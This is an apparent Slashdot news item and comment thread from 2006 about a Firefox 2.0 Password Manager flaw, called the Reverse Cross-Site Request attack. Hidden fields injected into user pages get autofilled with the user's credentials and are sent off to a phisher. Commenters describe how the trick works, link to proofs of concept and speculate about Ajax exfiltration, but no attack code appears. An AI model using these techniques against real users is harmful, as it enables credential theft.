Firefox 2.0 Password Manager Bug Exposes Passwords

zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."

But but but....

...secure by design!!

I sense a disturbance in the force...

...as though millions of Firefox users were laughing at IE users, and were suddenly silenced.

Cue "still more secure" arguments now.

Re:I sense a disturbance in the force...

Didn't even think of the 'response time' end.

Please look at the bug report. Submission of testcase file is November 12 (9 days ago)

From TFA:

It was first discovered in the wild by Netcraft on Oct. 27 (25 days ago)

The clock is ticking... will Firefox beat IE's response time?

Re:I sense a disturbance in the force...

I switched to IE7 a week ago after Vista RTMd. I don't miss FF. I've also been running without anti-virus for the entire week. I ran a system virus scan today and ZILCH - no viruses. No spyware or adware either. It might have to do with the fact that my machine isn't connected to a network...

Re:I sense a disturbance in the force...

I tested the proof of concept attack on IE7 before posting. The attack failed. TFA even says

RCSR attacks are also actively targeting Microsoft Internet Explorer, however a flaw in Firefox makes the attack much more likely to succeed.

Go RTFA (the proof of concept one) using IE and reply if you get a different result. I didn't try it with IE6.

Re:I sense a disturbance in the force...

HTML forms work just fine without Javascript. And yes, you're effectively tricked into clicking an action button. If you look at the sample "injected HTML", they make it look like the user is clicking a Flash movie when in fact they're clicking a blank image-type <input> on the page. This submits the GET-style form. So long as the user is "tricked" into clicking something, and forms are allowed, this could steal the password from the password manager.

The code is available in the text box at the bottom of the this page [info-svc.com]. Neither Flash nor Javascript is required to trigger the exploit, just a click from a user in a attacker-defined position on the page.

Many FF fans would say...

... this is just because IE6/7 have poor compatibility with the rest of the world. They can't even support the exploits, anymore, honestly.

OK, jokes aside, someone just released an exploit into the wild which *can't work on IE*. And they presumably still thought they were going to get something of value on it. Hiya, FireFox, welcome to the "visible enough to be a target" club. And it only gets worse. I hope your million bug finding eyes are bright and perky because it only gets worse and it never, ever stops.

Re:Many FF fans would say...

I don't think this is, per se, a bug. If you save a password for www.myspace.com, and there's a password field on www.myspace.com/*, the password manager should fill the field in. When they added the auto-fill feature (as opposed to, say, click a toolbar button to fill in passwords) they should've considered this.

And thus I think the million bug-finding eyes will be considerably less bleary if there are a million exploit-writing fingers. When you have anything that turns security into convenience like this, you should say "Hm. This could be exploited by foo method, and if this exploit becomes viable - if there's some popular website that allows arbitrary HTML - we should remove this feature for our users' sake."

Re:Many FF fans would say...

The password manager should only fill in the password on the actual page you have entered it on before. This is just common sense. There's many situations where you might enter different credentials at different parts of a site, or where entering your information at one page under a certain domain might actually be a bad thing. This is why I have password manager turned off on all my browsers. It's a littl more work to remember passwords, but it's a lot safer.

passwords have failed

Now that its 2006, can we now use a better form of "authentication" than a few ascii characters?

Every website wants you to have a password. You know, for important stuff like making a purchase because you use a password for a purchase at a brick and mortar store, right?

Well, since its a good practice to use unique passwords, and users get forgetful, then they use the web browser tool to store their passwords, then they forget their passwords, and when they use another computer or update their existing one, their tool does not work, and if it does work, then the browser gives away your passwords.

I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID). But all day at work, these programs continually ask for my password to the point that I dont consider my password secure because I have to change it, and use it so much, I'm desensisized (sp?) and say who cares?

Can we get over passwords soon?

Re:passwords have failed

I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID).

Locks get picked. Cars get stolen. RFID can be disrupted, tampered with or your card can get stolen (I'm assuming you don't have RFID tags in your arm). Likewise, passwords can be sniffed. Hell, it doesn't matter how good your encryption is, all it takes is a videocamera pointed at your keyboard.

How far you go, it doesn't matter. There will always be a trade-off between security and convenience. Personally, I trust a good lock more than I trust RFID. But even if you go all the way to biometrics, there will always be way a to hack the system.

Even so, this Firefox security flaw is a nasty one.

Re:passwords have failed

I strongly hope so. My recommendation would be public key authentication, the way SSH can do it. You'd need a private key (possibly on a crypto card, but a thumbdrive or floppy or whatever works fine) and a password for that. You authenticate to the key when launching your encryption agent, then any website that wants to verify who you are contacts your agent and does the authentication there.

Infinitely more secure than our current password system, a lot more convenient (think Microsoft Passport's bragged about convenience, except none of your data is stored on a central server), and all around the BetterWay(tm). The main downside if when roaming to another machine if you don't have your key, you don't have access. This can be addressed with either being able to fall back on a password (removing a lot of the security), or some means of authenticating to your home computer.

You could also add some sort of spec for feeding VCard info into the agent so that sites could use it to do a sort of shared profile feature, where you'd authorize a site to receive certain info and save you a lot of time filling stuff out.

Unfortunately this is just yet another thing on the list of "tech the way I think it should be", not anything on anyones todo lists.

Java ring?

Remember the Java ring? It had a processor and stored the private key in a tamper resistant case (erases instantly when case is compromised). PC programs would ask the Java ring to sign things. A virus could get bogus signatures while it was connected, but couldn't compromise the key. Unfortunately, it used a funky "One Wire" adaptor to get power and talk to a PC. If only they would reintroduce it in a USB format!

Re:passwords have failed

Passwords work great for me. I, however, use them with care.

Any site that uses financial information (my bank, eBay, PayPal, Amazon, or whatever I'm buying, my own servers, etc.) doesn't get the password stored in any form of password manager. On the other hand, inconsequential services like news sites, LUG sites, aquarium discussion groups and the like may have the passwords stored. If it's important, don't store it, don't write it on a post-it note, don't tell your friends.....people cannot be trusted.

It seems that any security protocol can be circumvented by exploiting the end users who use them poorly or rely on something other than common sense for security.

It took all of about 5 minutes to explain phishing to my girlfriend. Now, she's almost 1/104358506th as paranoid as I am, which is a good start.

Now, I'm out of tinfoil......off to the store.

Is it used?

People actually let their browsers remember their passwords? I have never trusted my browser that much.

Re:Is it used?

Saving passwords should not be a browser feature. I am ashamed that such a big bug could make it into firefox.

Saving passwords absolutely should be a browser feature; it's a feature I use all the time.

However, I too am ashamed that such a big bug - or rather, design flaw - could make it into Firefox. I understand the usefulness of being able to use the same saved password information across multiple login forms on one site, but surely someone should have realized the danger here. I mean, these are browser developers. They should have known better.

Hopefully they'll figure out a solution soon.

Not a lot of better options

If you have 50-100 passwords at various sites, established over years, there's really a shortage of other good options. You can go the old-school route and just write them all down on a pad of paper, or the slightly more sophisticated route and put them in a text file or encrypted database on your local machine, but that doesn't help you when you want to log into a site from another machine.

I was disappointed to hear of this vulnerability, because I use Google Browser Sync pretty heavily for keeping track of cookies and trivial passwords, and to be honest I'm not really sure what I'd do without it. More important passwords I keep in an old Palm Pilot using a GPLed password-management and generation program on it, but recalling passwords from it is a pain (takes several minutes to get Palm out, type in master password, etc.).

Re:Is it used?

It's not your own browser to worry about. It's others browsers. My roommate decided to borrow my machine and was stupid enough to have Firefox remember his password on my machine to the main school portal. No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use).

Of course, the truly telling moment was when I found out how lame his password is. Not that I'd expect anything different from someone dumb enough to store their password on someone else's computer in the first place.

So, in other words, passwords continue to be useless for people dumb enough to leave them lying around. I've used the same password for years and it's by no means secure (only just a bit more secure than using my first name) but it's never been an issue for me. The only time I've been concerned is when websites force me to come up with something that fits their requirements, because that means that I do end up writing it down somewhere. The sooner webmasters realize that setting specific requirements for passwords makes them less secure (my bank requires an alphanumeric PW 6-8 letters long with mixed case - that massively narrows down a brute force attack), the better. In the end, most of it comes down to user stupidity, so we might as well not limit the complexity of good users or force them to use something too obscure to remember (or, worse, say 'write this down in a place you can easily access').

Re:Is it used?

> No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use). Firefox, for as long as I can remember, has allowed you to set a master password, without which the password manager will not populate any password feilds and will not allow the viewing of any stored passwords.

Re:Is it used?

I use Konqueror/KWallet to remember most of my password. It's encrypted (requires a password to access), only fills in the forms on the page you originally hit "Save Password" on (inconvenient, but helps reduce the security issues), and closes the wallet (requiring re-entry of the password) when I lock my screen, my screensaver starts up, or after 10 minutes of non-use of the wallet. Slightly paranoid compared to Firefox, but it works.

just update it?

Stopgaps solutions are not a solution, I guess they're planning a 2.0.1 soon? The bug has been reported 10 days ago...

Arrrrr

The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.

Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?

Re:Arrrrr

When browsers added password management features 5 (?) years ago, there weren't a lot of sites that required passwords, included user-generated content, and allowed that user-generated content to include password fields. But there were (and still are) many sites where loading just about any URL on the site could give you a "you need to log in" page.

I'd be perfectly happy with this becoming part of the accepted security model for web applications, just like "don't let user-generated content include SCRIPT tags with arbitrary content".

Not just Firefox 2.0, also IE6/7 and earlier F'fox

According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.

So much for me being smug about going back to Firefox 1.5!

stopgap measures include...

...using Microsoft Internet Explorer. AAaaaaaaaaaaaargh!

i used that one

A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability

I used that one on my girlfriend. I believe it's also called the "Dirty Sanchez".

Meh ...

My feeling is, people who rely on "password managers" get what they deserve when their passwords end up in the wrong hands. It's generally just a bad idea to store passwords anywhere but your head.

Dis-satisfied with v2.0

I don't know about everyone else but I am generally dis-satisfied with v2.0. Frankly I felt that the memory leak in FF was significantly amplified in 2.0. I noticed back on 1.5 that every time I put my laptop into standby with FF running and then woke it up that FF would slowly increase it's memory consumption to about 30% more than what it was before being put into standby. Ie, if it was 100MB when it went to standby it would be around 130MB after waking the laptop, switching focus to FF, and clicking through my opened tabs. In FF 2.0 I have to literally shutdown FF every day or two or FF will easily consume upwards of 500MB of my RAM. I usually have about a dozen windows open and in each window I have 5-15 tabs. That's a fair bit but it didn't cause me much grief in v1.5.

It also took me a while to figure out how to remove the close button from each tab [wordpress.com]. The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix [lifehacker.com].

In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm [roboform.com], though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.

Re:Why I'm not using FF 2.0

but editing in about:config is nearly as fast

Editing about:config is nearly as fast, but finding out that there is a value to edit, what it's called and what to set it to is a damn sight slower...

I Love FF BUT its not in the spirit of OS

I love firefox and am very thankful for it being opensource but I loathe how Mozilla chooses to track and report bugs. I have been going around for days and could've been exploited - possibly but not probably - instead of being able to take appropriate measures to protect myself. It's not like this was some little secret the code was already out in the wild to do it. I find this security through obscurity in opensource projects absolutely disgusting. While we are possibly getting compromised they are sitting on their hands. We, the community, are here to quickly fix problems like these too. Thousands of developers could've and would work on this who the bug was hidden from. This makes the development process absolutely useless...

Sounds more like a bug in myspace

I thought the rule of thumb for any user-created content was to never allow freeform html? You either let them control their formatting with a separate markup (like BBCode), or you limit them to specific tags (like they do here). In neither of these situations is this exploit possible.

Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.

That said, much like language, the web is defined by its users. While I don't feel like it's Firefox's responsibility to fix issues like this, they'd do best to be aware of it. It wouldn't be a bad idea at all to tie password remembering to the exact url (at least everything up to the "?") by default.

That is Scary

That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.

Waiting for FF 3.0

I am still using FF1.5 because of all the problems with 2.0. Not just bugs like these, although they are disappointing, but reports of the ever present memory leak and the annoying revamps to the tabs bar. Then again, I am eagerly looking forward to upgrade to a better version so I can get some of the improvements, like crash restoration.

The patch...

An where's the patch for this? If the bug was hidden from all, then why would they go public with it without a patch? And why would they hide it in the first place? Open source developers could have submitted patches already!

no need to save passwords --generate em on the fly

There is a neat little piece of javascript at http://www.xs4all.nl/~jlpoutre/BoT/Javascript/Pass wordComposer/ [xs4all.nl] that lets you just think up a master password in your head and then use this applet to automatically generate a site-specific, unique hash and fill in the password field automatically. This way you can remember the passwords easily, you never have to save them or write them down. And if one site gets compromised, that password (the hash) won't work with any other site. The drawback is that if you don't have this piece of javascript then you can't get into your sites.

Obligatory disclaimer!

Aha!... that's why sometimes I don't remember posting bad language comments!

Thought until now of multiple personality but mystery solved! It was just my browser!...

PS: I shall not be held accountable for ANY of my comments...

If it affects Firefox and Internet Explorer...

Does anyone know if Konqueror (using KDE Wallet) is affected? And what about other browsers, like Opera, Epiphany, and so on? I'd just like to know how common this type of exploit is.

software level bug

While I agree FF should alert the user, this is not a hole in FF's security architecture. Its rather a software level bug. Moral of the story: 1. don't be lazy and ask your browser to remember your password. 2. if you insist to be lazy, store passwords only for trivial web accounts.

WARNING

DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5

Great!

No big deal. Since I use Thunderbird to check my email, and I don't pay for anything, there's nothing worth stealing. "OH NOES! SOMEONEZ HAX0R3D MY YTMND PASSWORD! T3H W0R1D IS 3ND1NG!!!!!!111one1" Seriously, all my important passwords (such as my Slashdot password), are stored in the most important place available: my brain. I figure, "If I can't remember the password for this site, this site is obviously inferior and not worthy of my attention!"

Credit card numbers are stored too.

If you have form autocomplete on, credit card numbers are stored in plaintext on your hard disk too. Bug's been open for .. what about 4 years now.

They refuse to fix it, they say it's not a bug.

I don't think it's vulnerable to this because it's not fully automatic, however, all someone has to do to get your credit card number is type the first digit and it'll fill in the rest.

Their advice, "Don't use autocomplete".

didn't work for me

i'm using firefox 2.0 on linux, first my popup blocker would allow the site to open when i clicked on the video like the instructions said, then when i allowed it i just got youtube.com?

Come on...

Just remember your freaking passwords in your head, is it that hard?

Alternatives to browser stored passwords

I for one only use the browsers store password feature for the most trivial of sites. For more important sites, I use Password Safe [sourceforge.net]. The program and the database fit easily on a thumb drive, and requires a master password to access. It has a user configurable time out, and a double click on an account copies the data to the clipboard for later use, allowing you to foil keyboard based sniffers.

Seems Opera Isn't Affected...

I'm using Opera 9.02 under Linux (Kubuntu 6.10), and could not get the proof-of-concept to work with Wand (Opera's Password Management). I don't think this would be much of an issue with any browser, though, if people would just use some common sense and not store passwords for important things like online banking. While it might suck to have someone exploit this for your Slashdot account and start trolling using your UID, it would be nothing more than an inconvenience. Online banking and credit card transactions, on the other hand, would be major problems. So really, this is a non-issue if you are already a security-minded person. The question: How many normal users are security-minded? The answer is, unfortunately, rather obvious, I think.

All the more reason to use opera.

Opera, my one true love... I shall never leave thee.

Thank God!

I have MS password management to control access to my Firefox password manager.

Phew!

Password safety

I have two types of passwords: The ones for fluff sites, like Slashdot, Wikipedia, hotmail (a.k.a. Spam box), and so forth, which usually get 1 of 2 passwords. Then for banks and credit cards and what have you, I use real passwords with different ones for each site.

I could care less if someone hacks my Slashdot account or my wikipedia account. The worst thing they can do is vandalize under my name. And as for hotmail, they can have my spam. And were I to have a myspace account, I could care less if someone got that too.

Fortunately, my bank and credit card companies don't allow others to create their own pages, so I'm not too concerned. I suspect this will get fixed long before it becomes a concern for me.

Hey

I was poking around a few days ago trying to get a userContent.css file to use a local filesystem png file as a background, without having to resort to huge data: URIs.
Eventually I'd thrown enough random ideas at the problem that I ended up finding out about this nightmare waiting to happen [mozilla.org]. Just for kicks I tried putting some code in the CSS to alert() all the (supposedly hidden) password values on the page. It worked.

My problem has never been in this area.

I don't mind that the program allows me to be stupid. Big deal...... I do mind however things like drive by hacks, (via activeX) cross-site scripting (ala JavaScript) etc. But do I expect the browser to be my mommy.... NO As for the supposed FF memory leak. That isn't the one that should affect you the most.... Cerebellum Memorus Diareatalis should.

PassPet

PassPet [passpet.org] is a nifty looking extension that hasn't actually been developed. Would help with this problem, as you have to actually click a button to fill in your password.

Actually a firefox security hole?

It all sounds that this is a whole bug with Javascript (again), and XSS in a trusted site, for god's sake people if someone can make a domain run whatever javascript code he wants they can just steal your cookies.

I would love to test whether it works when firefox is using the noscript addon, but I cannot, because I don't use the password manager, it is just retarded to let your browser remember your passwords, really.

The real intent here...

The Firefox teams real intent here was to keep all the geek's off myspace, or any "social networking site" for that matter. Shame on all of you for not knowing better!

I couldn't get it to work...

Not sure I understand what's supposed to happen. After clicking on the vid (on Chapin Information Service's demo), am I supposed to automatically go to Google? Chapin's demo exploit seems to tell me that I would be redirected to Google.com. It didn't...it went to YouTube where I was logged in under my normal user:pass. I didn't see any sign of anything in the address bar revealing my Chapin user:pass. Is the fact that I already had a YouTube account registered with Password Manager what caused the exploit to fail? Also, my popup blocker stopped Chapin's site from launching something first time through. Was this what threw a wrench in it? I tried manually going to Google.com immediately after clicking on the vid another time through (registering the same user:pass as the first time), but I just don't see anything to indicate that the exploit worked (my user:pass from the demo appears in Googe's address bar? Not that I could see.). Can someone please explain in a bit more detail what should have happened? Mozilla's exploit demo seemed to fail as well, dumping me on a "server not found" error page, but maybe that's what it's supposed to do if the exploit worked.

Tried the second demo on Mozilla's bugtracker. My popup blocker stopped a new window from launching. Nothing else happened that I could tell.

Appreciation expressed in advance to anyone who can enlighten me on what I should be experiencing in Firefox 2. Is this a Windows-version-only thing? I'm on Fedora Core 5.

* * * * *

All mankind is divided into three classes: those that are immovable, those that are movable, and those that move.
--Benjamin Franklin

myspace...

It is not a bug with firefox, it is a bug with myspace.
I doubt you will find many places other than myspace where this "bug" will be exploited. Why? Because most sites that host user generated content are responsible enough to remove the users ability to post potentially-malicious markup language on the site. These sites strip almost all (if not all) markup and only allow a small handful of decoration tags like BOLD. (Slashdot is a perfect example of allowed html markup)

The problem is that the code on myspace is shoddy at best, and the fact that users can put any kind of html on their myspace page was an accidental result of such. Then when users figured out they could customize their page with css and other markup code they were happy, and so myspace left it in.
Nowadays everyone is so used to myspace letting them customize their page (in a shitty hack sort of way) that if they were to take that aspect away I think myspace would die in a month (I know a lot of girls who only go on myspace so that they can upgrade their page and make it look better by customizing it) so they are not likely to ditch this "feature" of their site.

FF problems

Firefox started to dissappoint me. I do still belong to mustdie crowd but FF starts to irritate me.

First, it deletes files when they are dragged into the browser window . IE won't even allow you to do the dragging.

Second, if you are getting messages from your Yahoo groups by e-mail on your gmail account, the Yahoo ads are overlaying the text. IE does not do that.

I can easily foresee that if this will continue I am going to consider switching to some other browser. Any recommendations?

Not that bad

From what I have read, it takes a n00b to be fooled in that way. AFAIU, the phishing succeeds only if you send the autocompleted form. Who in the right mind would send the form that appeared from nowhere? If I do not expect a form in this place, I do not submit it.

I suspect that many bugs like that can be easily avoided by clean behaviour.

Could Ajax make it worse?

I was wondering, if FF or any browser auto-populates your login fields, couldn't someone use Ajax to just grab the values and send them to the server before you even hit submit?

Vulnerability worse with AJAX/Web 2.0?

I could be mistaken, but couldn't the need for the user to submit the form (request) be sidestepped with AJAX/Web 2.0 scripting, sending the password as soon as the field is populated? Or does the obfuscation of the password field in the browser prevent this?

This flaw affects Seamonkey as well

I just tested it with Seamonkey 1.0.6 (I prefer it over firefox) and the exploit happens on it as well.

I can't agree that this is a bug in Firefox

After carefully examining the issue, I come to the conclusion, that for this supposed issue to show up, it means that the legitimate site you are visiting has been hijacked, and a fake login form inserted. If that is the case, the user is liable to enter the username and password. Firefox password manager or not: when the user clicks submit, the password goes to the other site, whether password manager is enabled or not.

Anyone who can inject arbitrary HTML can possibly get your password. This isn't a bug, it's a consequence of submitting your password using an HTML form, and allowing other users fine control of what scripting and form elements appear on the page.

Sites that wish to guard against such attacks should utilize the more robust systems available for authentication, which include: HTTP authentication and Client-side SSL certificates. In both of these cases, a HTML page need not have direct access to the authentication information provided by the user to the web server.

Users of the browser should just be aware that 'password manager' is not an anti-phishing feature in this version of Firefox -- if the site you are visiting wishes to spill your password to another site, when you login, nothing can stop them, whether you use password manager or not. In fact, they can use AJAX to send your password to who knows what other sites in the world, from the moment you start typing it into a HTML form.

I only hit 'save password' for places where it's safe to do, and when I do so, I rather have it err on the side of filling in a password field, than ever have it err on the side of 'not filling in the password', because it thinks a form might be fake. I'll be the judge of that.

Cross-site forms are a feature of HTML. The issue in this case is that a page author can insert a malicious password form on a legitimate site in the first place.

Exploitation of this so called "bug" relies on the site you visit cooperating with the outside site.

That tells me it's not a bug in password manager. The bug is that a site allows a malicious login form to appear on it in the first place. EOM.

passwordmaker

better than any password manager: http://www.passwordmaker.org/ [passwordmaker.org]

Been there done that

But didn't buy the t-shirt [slashdot.org]

Re:What an incredible gaffe

Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?

Re:What an incredible gaffe

Right, because you contribute to Firefox, right? If you did, you'd of course have been able to spot this bug with your razor-sharp eyes, right? Oh wait... no, I just remembered you're fallible too, and quite possibly an idiot. Firefox is free. The dev team doesn't have to do shit, they choose to. Stop acting like an entitled 8-year-old at Christmas, and do something useful with your time.

Re:What an incredible gaffe

It would seem sort of silly to me to stop advocating Firefox because it has one BIG bug. Most browsers have 100 HUGE bugs. It is still better than any other browser.

I wouldn't think this would be a hard fix. Silly Firefox development team. =)

Re:Just 2.0 ?

Same here in 1.5.0.2

Re:Just 2.0 ?

I set my agent ID as firefox in Konqueror but the exploit didn't work. Damn, on of the few things user agent can't emulate.

Re:Just 2.0 ?

I just ran the test on 1.5.0.7 and I am not affected.

Somehow Firefox 1.5.0.8 seems to allow this exploit also. Are you sure 1.5.0.7 isn't vulnerable? If so, then wow I guess things went backwards between the two releases.

maybe it doesn't work the same on ubuntu

Although this could actually be why, I ran the test on a Windows XP Pro machine. If this only happens on Windows (though I don't know this for certain) chances are it might not be the Firefox team's fault after all. Interesting that 1passwd [it-observer.com] appears to have released a new version of their password manager little over a week ago before this exploit became publically known. Mac users might like the OS X keychain integration.

Re:Just 2.0 ?

I ran it (the proof of concept) on the same version and it didn't transmit anything to google.